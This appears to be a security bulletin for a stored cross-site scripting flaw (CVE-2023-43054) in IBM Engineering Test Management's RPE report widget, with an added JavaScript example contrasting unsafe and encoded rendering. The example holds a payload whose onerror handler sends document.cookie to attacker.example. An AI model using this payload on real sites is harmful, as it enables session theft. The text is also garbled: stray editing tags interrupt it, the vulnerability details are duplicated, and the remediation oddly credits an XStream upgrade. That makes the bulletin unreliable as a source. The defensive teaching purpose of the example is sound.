Security Bulletin: Stored XSS executing on RPE report widget when run from within ETM

Published: 2024-02-29 13:45:02
Source: www.ibm.com
Tags: xss, rpe report widget, ibm engineering test management, vulnerability, version 7.0.2, version 7.0.3, stored cross-site scripting, upgrading, xstream

CVSS3: 6.4 Medium

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

AI Score: 5.5 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.2%)

Summary

A stored cross-site scripting (XSS) issue in the RPE report widget, which executes when the widget is run from within ETM, has been addressed in RPE and is no longer observed in IBM Engineering Test Management.
</gra_replace>
<gr_replace lines="82-86" cat="clarify" orig="CVEID:">
CVE ID: CVE-2023-43054
DESCRIPTION: IBM Engineering Test Management is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session.
CVSS Base score: 6.4
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/267459 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)

Vulnerability Details

CVEID:CVE-2023-43054
**DESCRIPTION:**IBM Engineering Test Management is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
CVSS Base score: 6.4
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/267459 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)
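The description above is the usual stored-XSS pattern: a value an authenticated user saves into report data is later written into the page unencoded, so it runs in every viewer's browser under the hosting application's origin (here, the RPE widget rendering inside ETM, which is why the vector carries Scope: Changed). The following added example is not IBM's code and says nothing about how the RPE widget is actually implemented; the widget markup, the field names, the allow-list of expected tags and the stored payload are all constructed assumptions. It shows a widget that interpolates stored report fields straight into HTML beside the same widget with context-appropriate HTML encoding, plus a small check a test suite can run against rendered output.

```javascript
// Added example (not IBM's or RPE's code). A minimal "report widget" that
// renders stored, user-controlled report data into an HTML fragment.
// Everything below (markup, field names, payload) is a constructed assumption.

// Constructed sample of stored report data as an attacker could have saved it.
// A viewer's browser would fire the onerror handler and leak document.cookie,
// i.e. "credentials disclosure within a trusted session".
const STORED_REPORT = {
  name: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  owner: 'alice',
  rows: 3,
};

// Vulnerable form: stored strings are concatenated into markup. When this
// fragment is inserted with innerHTML (or an equivalent non-escaping template
// helper), the browser parses the stored value as HTML and executes it.
function renderReportWidgetUnsafe(report) {
  return '<div class="rpe-widget">' +
         `<h3>${report.name}</h3>` +
         `<span class="owner">${report.owner}</span> ` +
         `<span class="rows">${report.rows} rows</span>` +
         '</div>';
}

// Encode the characters that change meaning in HTML text and in double- or
// single-quoted attribute values. This helper is correct only for those
// contexts; URLs, inline JavaScript and CSS each need their own encoder.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened form: every untrusted value is encoded before it meets the markup.
// The template's own tags are still real tags; only stored data is neutralised.
function renderReportWidgetSafe(report) {
  return '<div class="rpe-widget">' +
         `<h3>${escapeHtml(report.name)}</h3>` +
         `<span class="owner">${escapeHtml(report.owner)}</span> ` +
         `<span class="rows">${escapeHtml(report.rows)} rows</span>` +
         '</div>';
}

// Regression check: the widget template may emit only these tags (assumed
// allow-list). Any other tag name in the rendered fragment came from data.
const ALLOWED_TAGS = new Set(['div', 'h3', 'span']);

function unexpectedTags(html) {
  const found = [];
  const tagRe = /<\/?([a-zA-Z][\w-]*)/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    if (!ALLOWED_TAGS.has(tag) && !found.includes(tag)) found.push(tag);
  }
  return found;
}

// Stand-alone run: the unsafe renderer leaks an <img> tag from data, the safe
// renderer does not.
console.log('unsafe:', unexpectedTags(renderReportWidgetUnsafe(STORED_REPORT)));
console.log('safe:  ', unexpectedTags(renderReportWidgetSafe(STORED_REPORT)));
```

The allow-list check is deliberately crude (a regex over the output, not a parser) and is meant as a unit-test tripwire for a template you control, not as a sanitizer: the fix is encoding at the output site, as in renderReportWidgetSafe, and the encoder must match the context the value lands in.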

Affected Products and Versions

Affected Product(s) Version(s)
IBM Engineering Test Management 7.0.2
IBM Engineering Test Management 7.0.3

Remediation/Fixes

IBM strongly recommends addressing the vulnerability now by upgrading and applying the suggested fix, which uses an upgraded version of XStream.

Suggested fixes:

Product(s) | Version(s) | Remediation/Fix/Instructions
---|---|---
IBM Engineering Test Management | 7.0.2 | Search for, download and apply ETM 7.0.2 iFix028 from IBM Fix Central
IBM Engineering Test Management | 7.0.3 | Search for, download and apply ETM 7.0.3 iFix003 from IBM Fix Central

Workarounds and Mitigations

None

Affected configurations (Vulners match rule)

ibm engineering_test_management matches 7.0.2 OR 7.0.3
